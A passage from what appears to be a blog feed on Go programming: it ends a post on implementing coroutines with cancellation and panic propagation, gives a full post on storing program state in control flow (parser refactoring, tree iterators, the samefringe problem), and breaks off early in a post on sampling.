<code>cancel</code> func. Calling <code>cancel</code> will be like <code>resume</code>, except that <code>yield</code> panics instead of returning a value. If a coroutine panics in a different way during cancellation, we want <code>cancel</code> to propagate that panic, just as <code>resume</code> does. But of course we don’t want <code>cancel</code> to propagate its own panic, so we create a unique panic value we can check for. We also have to handle a cancellation in before <code>f</code> begins. <pre>var ErrCanceled = errors.New(&#34;coroutine canceled&#34;) <span style="color: #aaa"></span> func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool), cancel func()) { cin := make(chan msg[In]) <span style="color: #aaa"> cout := make(chan msg[Out])</span> <span style="color: #aaa"> running := true</span> <span style="color: #aaa"> resume = func(in In) (out Out, ok bool) {</span> <span style="color: #aaa"> if !running {</span> <span style="color: #aaa"> return</span> <span style="color: #aaa"> }</span> cin &lt;- msg[In]{val: in} <span style="color: #aaa"> m := &lt;-cout</span> <span style="color: #aaa"> if m.panic != nil {</span> <span style="color: #aaa"> panic(m.panic)</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> return m.val, running</span> <span style="color: #aaa"> }</span> cancel = func() { e := fmt.Errorf(&#34;%w&#34;, ErrCanceled) // unique wrapper cin &lt;- msg[In]{panic: e} m := &lt;-cout if m.panic != nil &amp;&amp; m.panic != e { panic(m.panic) } } yield := func(out Out) In { cout &lt;- msg[Out]{val: out} m := &lt;-cin if m.panic != nil { panic(m.panic) } return m.val <span style="color: #aaa"> }</span> <span style="color: #aaa"> go func() {</span> <span style="color: #aaa"> defer func() {</span> <span style="color: #aaa"> if running {</span> <span style="color: #aaa"> running = false</span> <span style="color: #aaa"> cout &lt;- msg[Out]{panic: recover()}</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> }()</span> var out Out m := &lt;-cin if m.panic == nil { out = f(m.val, yield) } running = false cout &lt;- msg[Out]{val: out} }() return resume, cancel <span style="color: #aaa">}</span> </pre> <p> We could change <code>Pull</code> to use panics to cancel iterators as well, but in that context the explicit <code>bool</code> seems clearer, especially since stopping an iterator is unexceptional. <a class=anchor href="#sieve2"><h2 id="sieve2">Example: Prime Sieve Revisited</h2></a> <p> Let’s look at how panic propagation and cancellation make cleanup of the prime sieve “just work”. First let’s update the sieve to use the new API. The <code>counter</code> and <code>filter</code> functions are already “one-line” <code>return coro.New(...)</code> calls. They change signature to include the additional cancel func returned from <code>coro.New</code>: <pre>func counter() (func(bool) (int, bool), func()) { return coro.New(...) } func filter(p int, next func(bool) (int, bool)) (func(bool) (int, bool), func()) { return coro.New(...) } </pre> <p> Then let’s convert the <code>main</code> function to be a <code>primes</code> function that prints <code>n</code> primes (<a href="https://go.dev/play/p/XWV8ACRKjDS">full code</a>): <pre>func primes(n int) { next, cancel := counter() defer cancel() for i := 0; i &lt; n; i++ { p, _ := next(true) fmt.Println(p) next, cancel = filter(p, next) defer cancel() } } </pre> <p> When this function runs, after it has gotten <code>n</code> primes, it returns. Each of the deferred <code>cancel</code> calls cleans up the coroutines that were created. And what if one of the coroutines has a bug and panics? If the coroutine was resumed by a <code>next</code> call in <code>primes</code>, then the panic comes back to <code>primes</code>, and <code>primes</code>’s deferred <code>cancel</code> calls clean up all the other coroutines. If the coroutine was resumed by a <code>next</code> call in a <code>filter</code> coroutine, then the panic will propagate up to the waiting <code>filter</code> coroutine and then the next waiting <code>filter</code> coroutine, and so on, until it gets to the <code>p</code> <code>:=</code> <code>next(true)</code> in <code>primes</code>, which will again clean up the remaining coroutines. <a class=anchor href="#api"><h2 id="api">API</h2></a> <p> The API we’ve arrived at is:<blockquote> <p> New creates a new, paused coroutine ready to run the function f. The new coroutine is a goroutine that never runs on its own: it only runs while some other goroutine invokes and waits for it, by calling resume or cancel. <p> A goroutine can pause itself and switch to the new coroutine by calling resume(in). The first call to resume starts f(in, yield). Resume blocks while f runs, until either f calls yield(out) or returns out. When f calls yield, yield blocks and resume returns out, true. When f returns, resume returns out, false. When resume has returned due to a yield, the next resume(in) switches back to f, with yield returning in. <p> Cancel stops the execution of f and shuts down the coroutine. If resume has not been called, then f does not run at all. Otherwise, cancel causes the blocked yield call to panic with an error satisfying errors.Is(err, ErrCanceled). <p> If f panics and does not recover the panic, the panic is stopped in f’s coroutine and restarted in the goroutine waiting for f, by causing the blocked resume or cancel that is waiting to re-panic with the same panic value. Cancel does not re-panic when f’s panic is one that cancel itself triggered. <p> Once f has returned or panicked, the coroutine no longer exists. Subsequent calls to resume return zero, false. Subsequent calls to cancel simply return. <p> The functions resume, cancel, and yield can be passed between and used by different goroutines, in effect dynamically changing which goroutine is “the coroutine.” Although New creates a new goroutine, it also establishes an invariant that one goroutine is always blocked, either in resume, cancel, yield, or (right after New) waiting for the resume that will call f. This invariant holds until f returns, at which point the new goroutine is shut down. The net result is that coro.New creates new concurrency in the program without any new parallelism. <p> If multiple goroutines call resume or cancel, those calls are serialized. Similarly, if multiple goroutines call yield, those calls are serialized.</blockquote> <pre>func New[In, Out any](f func(in In, yield func(Out) In) Out) (resume func(In) (Out, bool), cancel func()) </pre> <a class=anchor href="#efficiency"><h2 id="efficiency">Efficiency</h2></a> <p> As I said at the start, while it’s important to have a definition of coroutines that can be understood by reference to a pure Go implementation, I believe we should use an optimized runtime implementation. On my 2019 MacBook Pro, passing values back and forth using the channel-based <code>coro.New</code> in this post requires approximately 190ns per switch, or 380ns per value in <code>coro.Pull</code>. Remember that <code>coro.Pull</code> would not be the standard way to use an iterator: the standard way would be to invoke the iterator directly, which has no coroutine overhead at all. You only need <code>coro.Pull</code> when you want to process iterated values incrementally, not using a single for loop. Even so, we want to make <code>coro.Pull</code> as fast as we can. <p> First I tried having the compiler mark send-receive pairs and leave hints for the runtime to fuse them into a single operation. That would let the channel runtime bypass the scheduler and jump directly to the other coroutine. This implementation requires about 118ns per switch, or 236ns per pulled value (38% faster). That’s better, but it’s still not as fast as I would like. The full generality of channels is adding too much overhead. <p> Next I added a direct coroutine switch to the runtime, avoiding channels entirely. That cuts the coroutine switch to three atomic compare-and-swaps (one in the coroutine data structure, one for the scheduler status of the blocking coroutine, and one for the scheduler status of the resuming coroutine), which I believe is optimal given the safety invariants that must be maintained. That implementation takes 20ns per switch, or 40ns per pulled value. This is about 10X faster than the original channel implementation. Perhaps more importantly, 40ns per pulled value seems small enough in absolute terms not to be a bottleneck for code that needs <code>coro.Pull</code>. Storing Data in Control Flow tag:research.swtch.com,2012:research.swtch.com/pcdata 2023-07-11T14:00:00-04:00 2023-07-11T14:02:00-04:00 Write programs, not simulations of programs. <p> A decision that arises over and over when designing concurrent programs is whether to represent program state in control flow or as data. This post is about what that decision means and how to approach it. Done well, taking program state stored in data and storing it instead in control flow can make programs much clearer and more maintainable than they otherwise would be. <p> Before saying much more, it’s important to note that <a href="https://www.youtube.com/watch?v=oV9rvDllKEg">concurrency is not parallelism.</a>: <ul> <li> <p> Concurrency is about <i>how you write programs</i>, about being able to compose independently executing control flows, whether you call them processes or threads or goroutines, so that your program can be <i>dealing with</i> lots of things at once without turning into a giant mess. <li> <p> On the other hand, parallelism is about <i>how you execute programs</i>, allowing multiple computations to run simultaneously, so that your program can be <i>doing</i> lots of things at once efficiently.</ul> <p> Concurrency lends itself naturally to parallel execution, but the focus in this post is about how to use concurrency to write cleaner programs, not faster ones. <p> The difference between concurrent programs and non-concurrent programs is that concurrent programs can be written as if they are executing multiple independent control flows at the same time. The name for the smaller control flows varies by language: thread, task, process, fiber, coroutine, goroutine, and so on. No matter the name, the fundamental point for this post is that writing a program in terms of multiple independently executing control flows allows you to store program state in the execution state of one or more of those control flows, specifically in the program counter (which line is executing in that piece) and on the stack. Control flow state can always be maintained as explicit data instead, but then the explicit data form is essentially simulating the control flow. Most of the time, using the control flow features built into a programming language is easier to understand, reason about, and maintain than simulating them in data structures. <p> The rest of this post illustrates the rather abstract claims I’ve been making about storing data in control flow by walking through some concrete examples. They happen to be written in <a href="https://go.dev/">Go</a>, but the ideas apply to any language that supports writing concurrent programs, including essentially every modern language. <a class=anchor href="#step"><h2 id="step">A Step-by-Step Example</h2></a> <p> Here is a seemingly trivial problem that demonstrates what it means to store program state in control flow. Suppose we are reading characters from a file and want to scan over a C-style double-quoted string. In this case, we have a non-parallel program. There is no opportunity for parallelism here, but as we will see, concurrency can still play a useful part. <p> If we don’t worry about checking the exact escape sequences in the string, it suffices to match the regular expression <code>"([^"\\]|\\.)*"</code>, which matches a double quote, then a sequence of zero or more characters, and then another double quote. Between the quotes, a character is anything that’s not a quote or backslash, or else a backslash followed by anything (including a quote or backslash). <p> Every regular expression can be compiled into finite automaton or state machine, so we might use a tool to turn that specification into this Go code: <pre>state := 0 for { c := read() switch state { case 0: if c != '"' { return false } state = 1 case 1: if c == '"' { return true } if c == '\\' { state = 2 } else { state = 1 } case 2: state = 1 } } </pre> <p> The code has a single variable named <code>state</code> that represents the state of the automaton. The for loop reads a character and updates the state, over and over, until it finds either the end of the string or a syntax error. This is the kind of code that a program would write and that only a program could love. It’s difficult for people to read, and it will be difficult for people to maintain. <p> The main reason this program is so opaque is that its program state is stored as data, specifically in the variable named <code>state</code>. When it’s possible to store state in code instead, that often leads to a clearer program. To see this, let’s transform the program, one small step at a time, into an equivalent but much more understandable version. <p> <p> We can start by duplicating the <code>read</code> calls into each case of the switch: <pre><span style="color: #aaa">state := 0 state := 0</span> <span style="color: #aaa">for { for {</span> c := read() <span style="color: #aaa"> switch state { switch state {</span> <span style="color: #aaa"> case 0: case 0:</span> c := read() <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> state = 1 state = 1</span> <span style="color: #aaa"> case 1: case 1:</span> c := read() <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> state = 2 state = 2</span> <span style="color: #aaa"> } else { } else {</span> <span style="color: #aaa"> state = 1 state = 1</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> case 2: case 2:</span> c := read() <span style="color: #aaa"> state = 1 state = 1</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa">} }</span> </pre> <p> (In this and all the displays that follow, the old program is on the left, the new program is on the right, and lines that haven’t changed are printed in gray text.) <p> <p> Now, instead of writing to <code>state</code> and then immediately going around the for loop again to look up what to do in that state, we can use code labels and goto statements: <pre>state := 0 state0: for { switch state { case 0: <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> state = 1 goto state1 case 1: state1: <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> state = 2 goto state2 <span style="color: #aaa"> } else { } else {</span> state = 1 goto state1 <span style="color: #aaa"> } }</span> case 2: state2: c := read() read() state = 1 goto state1 } } </pre> <p> Then we can simplify the program further. The <code>goto</code> <code>state1</code> right before the <code>state1</code> label is a no-op and can be deleted. And we can see that there’s only one way to get to state2, so we might as well replace the <code>goto</code> <code>state2</code> with the actual code from state2: <pre><span style="color: #aaa">state0: state0:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> goto state1 <span style="color: #aaa">state1: state1:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> goto state2 } else { goto state1 } state2: <span style="color: #aaa"> read() read()</span> <span style="color: #aaa"> goto state1 goto state1</span> } else { goto state1 } </pre> <p> Then we can factor the “goto state1” out of both branches of the if statement. <pre><span style="color: #aaa">state0: state0:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> </span> <span style="color: #aaa">state1: state1:</span> <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> read() read()</span> goto state1 } } else { goto state1 goto state1 } </pre> <p> Then we can drop the unused <code>state0</code> label and replace the <code>state1</code> loop with an actual loop. Now we have something that looks like a real program: <pre>state0: <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c != &#39;&#34;&#39; { if c != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false return false</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> </span> state1: for { <span style="color: #aaa"> c := read() c := read()</span> <span style="color: #aaa"> if c == &#39;&#34;&#39; { if c == &#39;&#34;&#39; {</span> <span style="color: #aaa"> return true return true</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> read() read()</span> <span style="color: #aaa"> } }</span> goto state1 } </pre> <p> We can simplify a little further, eliminating some unnecessary variables, and we can make the check for the final quote (<code>c</code> <code>==</code> <code>""</code>) be the loop terminator. <pre>c := read() if read() != &#39;&#34;&#39; { if c != &#39;&#34;&#39; { <span style="color: #aaa"> return false return false</span> <span style="color: #aaa">} }</span> <span style="color: #aaa"> </span> for { var c byte c := read() for c != &#39;&#34;&#39; { if c == &#39;&#34;&#39; { c = read() return true } <span style="color: #aaa"> if c == &#39;\\&#39; { if c == &#39;\\&#39; {</span> <span style="color: #aaa"> read() read()</span> <span style="color: #aaa"> } }</span> <span style="color: #aaa">} }</span> return true </pre> <p> The final version is: <pre>func parseQuoted(read func() byte) bool { if read() != '"' { return false } var c byte for c != '"' { c = read() if c == '\\' { read() } } return true } </pre> <p> Earlier I explained the regular expression by saying it “matches a double quote, then a sequence of zero or more characters, and then another double quote. Between the quotes, a character is anything that’s not a quote or backslash, or else a backslash followed by anything.” It’s easy to see that this program does exactly that. <p> Hand-written programs can have opportunities to use control flow too. For example, here is a version that a person might have written by hand: <pre>if read() != '"' { return false } inEscape := false for { c := read() if inEscape { inEscape = false continue } if c == '"' { return true } if c == '\\' { inEscape = true } } </pre> <p> The same kinds of small steps can be used to convert the boolean variable <code>inEscape</code> from data to control flow, ending at the same cleaned up version. <p> <p> Either way, the <code>state</code> variable in the original is now implicitly represented by the program counter, meaning which part of the program is executing. The comments in this version indicate the implicit value of the original’s <code>state</code> (or <code>inEscape</code>) variables: <pre><span style="color: #aaa">func parseQuoted(read func() byte) bool {</span> // state == 0 <span style="color: #aaa"> if read() != &#39;&#34;&#39; {</span> <span style="color: #aaa"> return false</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"></span> <span style="color: #aaa"> var c byte</span> <span style="color: #aaa"> for c != &#39;&#34;&#39; {</span> // state == 1 (inEscape = false) <span style="color: #aaa"> c = read()</span> <span style="color: #aaa"> if c == &#39;\\&#39; {</span> // state == 2 (inEscape = true) <span style="color: #aaa"> read()</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> return true</span> <span style="color: #aaa">}</span> </pre> <p> The original program was, in essence, <i>simulating</i> this control flow using the explicit <code>state</code> variable as a program counter, tracking which line was executing. If a program can be converted to store explicit state in control flow instead, then that explicit state was merely an awkward simulation of the control flow. <a class=anchor href="#more"><h2 id="more">More Threads for More State</h2></a> <p> Before widespread support for concurrency, that kind of awkward simulation was often necessary, because a different part of the program wanted to use the control flow instead. <p> For example, suppose the text being parsed is the result of decoding base64 input, in which sequences of four 6-bit characters (drawn from a 64-character alphabet) decode to three 8-bit bytes. The core of that decoder looks like: <pre>for { c1, c2, c3, c4 := read(), read(), read(), read() b1, b2, b3 := decode(c1, c2, c3, c4) write(b1) write(b2) write(b3) } </pre> <p> If we want those <code>write</code> calls to feed into the parser from the previous section, we need a parser that can be called with one byte at a time, not one that demands a <code>read</code> callback. This decode loop cannot be presented as a <code>read</code> callback because it obtains 3 input bytes at a time and uses its control flow to track which ones have been written. Because the decoder is storing its own state in its control flow, <code>parseQuoted</code> cannot. <p> In a non-concurrent program, this base64 decoder and <code>parseQuoted</code> would be at an impasse: one would have to give up its use of control flow state and fall back to some kind of simulated version instead. <p> <p> To rewrite <code>parseQuoted</code>, we have to reintroduce the <code>state</code> variable, which we can encapsulate in a struct with a <code>Write</code> method: <pre>type parser struct { state int } func (p *parser) Init() { p.state = 0 } func (p *parser) Write(c byte) Status { switch p.state { case 0: if c != '"' { return BadInput } p.state = 1 case 1: if c == '"' { return Success } if c == '\\' { p.state = 2 } else { p.state = 1 } case 2: p.state = 1 } return NeedMoreInput } </pre> <p> The <code>Init</code> method initializes the state, and then each <code>Write</code> loads the state, takes actions based on the state and the input byte, and then saves the state back to the struct. <p> For <code>parseQuoted</code>, the state machine is simple enough that this may be completely fine. But maybe the state machine is much more complex, or maybe the algorithm is best expressed recursively. In those cases, being passed an input sequence by the caller one byte at a time means making all that state explicit in a data structure simulating the original control flow. <p> Concurrency eliminates the contention between different parts of the program over which gets to store state in control flow, because now there can be multiple control flows. <p> <p> Suppose we already have the <code>parseQuoted</code> function, and it’s big and complicated and tested and correct, and we don’t want to change it. We can avoid editing that code at all by writing this wrapper: <pre>type parser struct { c chan byte status chan Status } func (p *parser) Init() { p.c = make(chan byte) p.status = make(chan Status) go p.run() &lt;-p.status // always NeedMoreInput } func (p *parser) run() { if !parseQuoted(p.read) { p.status &lt;- BadSyntax } else { p.status &lt;- Success } } func (p *parser) read() byte { p.status &lt;- NeedMoreInput return &lt;-p.c } func (p *parser) Write(c byte) Status { p.c &lt;- c return &lt;-p.status } </pre> <p> Note the use of <code>parseQuoted</code>, completely unmodified, in the <code>run</code> method. Now the base64 decoder can use <code>p.Write</code> and keep its program counter and local variables. <p> The new goroutine that <code>Init</code> creates runs the <code>p.run</code> method, which invokes the original <code>parseQuoted</code> function with an appropriate implementation of <code>read</code>. Before starting <code>p.run</code>, <code>Init</code> allocates two channels for communicating between the <code>p.run</code> method, runing in its own goroutine, and whatever goroutine calls <code>p.Write</code> (such as the base64 decoder’s goroutine). The channel <code>p.c</code> carries bytes from <code>Write</code> to <code>read</code>, and the channel <code>p.status</code> carries status updates back. Each time <code>parseQuoted</code> calls <code>read</code>, <code>p.read</code> sends <code>NeedMoreInput</code> on <code>p.status</code> and waits for an input byte on <code>p.c</code>. Each time <code>p.Write</code> is called, it does the opposite: it sends the input byte <code>c</code> on <code>p.c</code> and then waits for and returns an updated status from <code>p.status</code>. These two calls take turns, back and forth, one executing and one waiting at any given moment. <p> To get this cycle going, the <code>Init</code> method does the initial receive from <code>p.status</code>, which will correspond to the first <code>read</code> in <code>parseQuoted</code>. The actual status for that first update is guaranteed to be <code>NeedMoreInput</code> and is discarded. To end the cycle, we assume that when <code>Write</code> returns <code>BadSyntax</code> or <code>Success</code>, the caller knows not to call <code>Write</code> again. If the caller incorrectly kept calling <code>Write</code>, the send on <code>p.c</code> would block forever, since <code>parseQuoted</code> is done. We would of course make that more robust in a production implementation. <p> <p> By creating a new control flow (a new goroutine), we were able to keep the code-state-based implementation of <code>parseQuoted</code> as well as our code-state-based base64 decoder. We avoided having to understand the internals of either implementation. In this example, both are trivial enough that rewriting one would not have been a big deal, but in a larger program, it could be a huge win to be able to write this kind of adapter instead of having to make changes to existing code. As we’ll discuss <a href="#limitations">later</a>, the conversion is not entirely free – we need to make sure the extra control flow gets cleaned up, and we need to think about the cost of the context switches – but it may well still be a net win. <a class=anchor href="#stack"><h2 id="stack">Store Stacks on the Stack</h2></a> <p> The base64 decoder’s control flow state included not just the program counter but also two local variables. Those would have to be pulled out into a struct if the decoder had to be changed not to use control flow state. Programs can use an arbitrary number of local variables by using their call stack. For example, suppose we have a simple binary tree data structure: <pre>type Tree[V any] struct { left *Tree[V] right *Tree[V] value V } </pre> <p> If you can’t use control flow state, then to implement iteration over this tree, you have to introduce an explicit “iterator”: <pre>type Iter[V any] struct { stk []*Tree[V] } func (t *Tree[V]) NewIter() *Iter[V] { it := new(Iter[V]) for ; t != nil; t = t.left { it.stk = append(it.stk, t) } return it } func (it *Iter[V]) Next() (v V, ok bool) { if len(it.stk) == 0 { return v, false } t := it.stk[len(it.stk)-1] v = t.value it.stk = it.stk[:len(it.stk)-1] for t = t.right; t != nil; t = t.left { it.stk = append(it.stk, t) } return v, true } </pre> <p> <p> On the other hand, if you can use control flow state, confident that other parts of the program that need their own state can run in other control flows, then you can implement iteration without an explicit iterator, as a method that calls a yield function for each value: <pre>func (t *Tree[V]) All(f func(v V)) { if t != nil { t.left.All(f) f(t.value) t.right.All(f) } } </pre> <p> The <code>All</code> method is obviously correct. The correctness of the <code>Iter</code> version is much less obvious. The simplest explanation is that <code>Iter</code> is simulating <code>All</code>. The <code>NewIter</code> method’s loop that sets up <code>stk</code> is simulating the recursion in <code>t.All(f)</code> down successive <code>t.left</code> branches. <code>Next</code> pops and saves the <code>t</code> at the top of the stack and then simulates the recursion in <code>t.right.All(f)</code> down successive <code>t.left</code> branches, setting up for the next <code>Next</code>. Finally it returns the value from the top-of-stack <code>t</code>, simulating <code>f(value)</code>. <p> We could write code like <code>NewIter</code> and argue its correctness by explaining that it simulates a simple function like <code>All</code>. I’d rather write <code>All</code> and stop there. <a class=anchor href="#tree"><h2 id="tree">Comparing Binary Trees</h2></a> <p> One might argue that <code>NewIter</code> is better than <code>All</code>, because it does not use any control flow state, so it can be used in contexts that already use their control flows to hold other information. For example, what if we want to traverse two binary trees at the same time, checking that they hold the same values even if their internal structure differs. With <code>NewIter</code>, this is straighforward: <pre>func SameValues[V any](t1, t2 *Tree[V]) bool { it1 := t1.NewIter() it2 := t2.NewIter() for { v1, ok1 := it1.Next() v2, ok2 := it2.Next() if v1 != v2 || ok1 != ok2 { return false } if !ok1 &amp;&amp; !ok2 { return true } } } </pre> <p> This program cannot be written as easily using <code>All</code>, the argument goes, because <code>SameValues</code> wants to use its own control flow (advancing two lists in lockstep) that cannot be replaced by <code>All</code>’s control flow (recursion over the tree). But this is a false dichotomy, the same one we saw with <code>parseQuoted</code> and the base64 decoder. If two different functions have different demands on control flow state, they can run in different control flows. <p> <p> In our case, we can write this instead: <pre><span style="color: #aaa">func SameValues[V any](t1, t2 *Tree[V]) bool {</span> c1 := make(chan V) c2 := make(chan V) go gopher(c1, t1.All) go gopher(c2, t2.All) <span style="color: #aaa"> for {</span> v1, ok1 := &lt;-c1 v2, ok2 := &lt;-c2 <span style="color: #aaa"> if v1 != v2 || ok1 != ok2 {</span> <span style="color: #aaa"> return false</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> if !ok1 &amp;&amp; !ok2 {</span> <span style="color: #aaa"> return true</span> <span style="color: #aaa"> }</span> <span style="color: #aaa"> }</span> <span style="color: #aaa">}</span> <span style="color: #aaa"></span> func gopher[V any](c chan&lt;- V, all func(func(V))) { all(func(v V) { c &lt;- v }) close(c) } </pre> <p> The function <code>gopher</code> uses <code>all</code> to walk a tree, announcing each value into a channel. After the walk, it closes the channel. <p> <code>SameValues</code> starts two concurrent gophers, each of which walks one tree and announces the values into one channel. Then <code>SameValues</code> does exactly the same loop as before to compare the two value streams. <p> Note that <code>gopher</code> is not specific to binary trees in any way: it applies to <i>any</i> iteration function. That is, the general idea of starting a goroutine to run the <code>All</code> method works for converting any code-state-based iteration into an incremental iterator. My next post, “<a href="coro">Coroutines for Go</a>,” expands on this idea. <a class=anchor href="#limits"><h2 id="limits">Limitations</h2></a> <p> This approach of storing data in control flow is not a panacea. Here are a few caveats: <ul> <li> <p> If the state needs to evolve in ways that don’t naturally map to control flow, then it’s usually best to leave the state as data. For example, the state maintained by a node in a distributed system is usually not best represented in control flow, because timeouts, errors, and other unexpected events tend to require adjusting the state in unpredictable ways. <li> <p> If the state needs to be serialized for operations like snapshots, or sending over a network, that’s usually easier with data than code. <li> <p> When you do need to create multiple control flows to hold different control flow state, the helper control flows need to be shut down. When <code>SameValues</code> returns false, it leaves the two concurrent <code>gopher</code>s blocked waiting to send their next values. Instead, it should unblock them. That requires communication in the other direction to tell <code>gopher</code> to stop early. “<a href="coro">Coroutines for Go</a>” shows that. <li> <p> In the multiple thread case, the switching costs can be significant. On my laptop, a C thread switch takes a few microseconds. A channel operation and goroutine switch is an order of magnitude cheaper: a couple hundred nanoseconds. An optimized coroutine system can reduce the cost to tens of nanoseconds or less.</ul> <p> In general, storing data in control flow is a valuable tool for writing clean, simple, maintainable programs. Like all tools, it works very well for some jobs and not as well for others. <a class=anchor href="#gopher"><h2 id="gopher">Counterpoint: John McCarthy’s GOPHER</h2></a> <p> The idea of using concurrency to align a pair of binary trees is over 50 years old. It first appeared in Charles Prenner’s “<a href="https://dl.acm.org/doi/abs/10.1145/942582.807990">The control structure facilities of ECL</a>” (<i>ACM SIGPLAN Notices</i>, Volume 6, Issue 12, December 1971; see pages 106–109). In that presentation, titled “Tree Walks Using Coroutines”, the problem was to take two binary trees A and B with the same number of nodes and copy the value sequence from A into B despite the two having different internal structure. They present a straightforward coroutine-based variant. <p> Brian Smith and Carl Hewitt introduced the problem of simply comparing two Lisp-style cons trees (in which internal nodes carry no values) in their draft of “<a href="https://www.scribd.com/document/185900689/A-Plasma-Primer">A Plasma Primer</a>” (March 1975; see pages 61-62). For that problem, which they named “samefringe”, they used continuation-based actors to run a pair of “fringe” actors (credited to Howie Shrobe) over the two trees and report nodes back to a comparison loop. <p> Gerald Sussman and Guy Steele presented the samefringe problem again, in “<a href="https://dspace.mit.edu/bitstream/handle/1721.1/5794/AIM-349.pdf">Scheme: An Interpreter for Extended Lambda Calculus</a>” (December 1975; see pages 8–9), with roughly equivalent code (crediting Smith, Hewitt, and Shrobe for inspiration). They refer to it as a “classic problem difficult to solve in most programming languages”. <p> In August 1976, <i>ACM SIGART Bulletin</i> published Patrick Greussay’s “<a href="https://dl.acm.org/doi/10.1145/1045270.1045273">An Iterative Lisp Solution to the Samefringe Problem</a>”, This prompted <a href="https://dl.acm.org/action/showFmPdf?doi=10.1145%2F1045276">a response letter by Tim Finin and Paul Rutler in the November 1976 issue</a> (see pages 4–5) pointing out that Greussay’s solution runs in quadratic time and memory but also remarking that “the SAMEFRINGE problem has been notoriously overused as a justification for coroutines.” That discussion prompted <a href="https://dl.acm.org/action/showFmPdf?doi=10.1145%2F1045283">a response letter by John McCarthy in the February 1977 issue</a> (see page 4). <p> In his response, titled “Another samefringe”, McCarthy gives the following LISP solution: <pre>(DE SAMEFRINGE (X Y) (OR (EQ X Y) (AND (NOT (ATOM X)) (NOT (ATOM Y)) (SAME (GOPHER X) (GOPHER Y))))) (DE SAME (X Y) (AND (EQ (CAR X) (CAR Y)) (SAMEFRINGE (CDR X) (CDR Y)))) (DE GOPHER (U) (COND ((ATOM (CAR U)) U) (T (GOPHER (CONS (CAAR U) (CONS (CDAR U) (CDR U))))))) </pre> <p> He then explains:<blockquote> <p> <i>gopher</i> digs up the first atom in an S-expression, piling up the <i>cdr</i> parts (with its hind legs) so that indexing through the atoms can be resumed. Because of shared structure, the number of new cells in use in each argument at any time (apart from those occupied by the original expression and assuming iterative execution) is the number of <i>cars</i> required to go from the top to the current atom – usually a small fraction of the size of the S-expression.</blockquote> <p> In modern terms, McCarthy’s <code>GOPHER</code> loops applying <a href="https://en.wikipedia.org/wiki/Tree_rotation">right tree rotations</a> until the leftmost node is at the top of the tree. <code>SAMEFRINGE</code> applies <code>GOPHER</code> to the two trees, compares the tops, and then loops to consider the remainders. <p> After presenting a second, more elaborate solution, McCarthy remarks:<blockquote> <p> I think all this shows that <i>samefringe</i> is not an example of the need for co-routines, and a new “simplest example” should be found. There is no merit in merely moving information from data structure to control structure, and it makes some kinds of modification harder.</blockquote> <p> I disagree with “no merit”. We can view McCarthy’s <code>GOPHER</code>-ized trees as an encoding of the same stack that <code>NewIter</code> maintains but in tree form. The correctness follows for the same reasons: it is simulating a simple recursive traversal. This <code>GOPHER</code> is clever, but it only works on trees. If you’re not John McCarthy, it’s easier to write the recursive traversal and then rely on the general, concurrency-based <code>gopher</code> we saw earlier to do the rest. <p> My experience is that when it is possible, moving information from data structure to control structure usually makes programs clearer, easier to understand, and easier to maintain. I hope you find similar results. The Magic of Sampling, and its Limitations tag:research.swtch.com,2012:research.swtch.com/sample 2023-02-04T12:00:00-05:00 2023-02-04T12:02:00-05:00 The magic of using small samples to learn about large data sets. <p> Suppose I have a large number of M&amp;Ms and want to estimate what fraction of them have <a href="https://spinroot.com/pjw">Peter’s face</a> on them. As one does. <p> <img name="sample-pjw1" class="center pad resizable" width=450 height=276 src="sample-pjw1.jpg" srcset="sample-pjw1.jpg 1x, sample-pjw1@2x.jpg 2x, sample-pjw1@4x.jpg 4x"> <p> If I am too lazy to count them all, I can estimate the true fraction using sampling: pick N at random, count how many P have Peter’s face, and then estimate the fraction to be P/N. <p> I can <a href="https://go.dev/play/p/GQr6ShQ_ivG">write a Go program</a> to pick 10 of the 37 M&amp;Ms for me: 27 30 1 13 36 5 33 7 10 19. (Yes, I am too lazy to count them, but I was not 